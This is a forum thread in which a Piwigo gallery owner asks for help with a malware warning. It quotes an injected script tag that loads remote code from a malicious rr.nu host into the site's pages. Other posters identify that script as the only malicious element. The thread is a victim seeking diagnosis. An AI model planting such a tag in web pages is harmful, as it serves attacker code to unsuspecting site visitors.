Argh. I've been infected with malware according to Google and can't figure out how to deal with it. Frustrating cuz I can't see the infection. Others have sent me copies of the script from the source code so I know it's there at least for some browsers or whatever.
This is a piece of the source code that some people see:
<!—Plugin Statistics-->
</div> <div> <script src=http://alhe81rbert.rr.nu/nl.php?p=d></script>
</body>
But this is what I see when I view of the source code of the page:
<!-- Plugin Statistics -->
</div> <div>
</body>
I've overwritten the software several times and now totally replaced with an upgrade using http://piwigo.org/basics/upgrade_manual. So it should be an entire new software; all that's carried over is the database and some of the pictures. Most of the pictures were lost in the process. I then asked for a Google review and they say it's still contaminated.
There are scanners that have identified suspicions in two .js files. Here are the text of those two files.
https://docs.google.com/file/d/0B4a1eB9 … sp=sharing
https://docs.google.com/file/d/0B4a1eB9 … sp=sharing
Where can the injected script come from? Database? Pictures?
Offline
I don't know which scanners you use but none of these two files is malicious....
and again : why to you open a new thread ?
Offline
Hi Mistic. I'm scanning the url using Securi. Here's the scan http://sitecheck.sucuri.net/results/kozpics.com . The two .js files are listed here.
I started a new thread for a new question. Previous thread was asking how to save files into a new piwigo installation. Now I'm asking where is this malware coming from. Seems I can't solve this without either entirely uninstalling piwigo and data or learning how the malware is bing inserted.
Offline
The js files are listed but not in the "malicious" list
only the one from rr.nu is malicious
Offline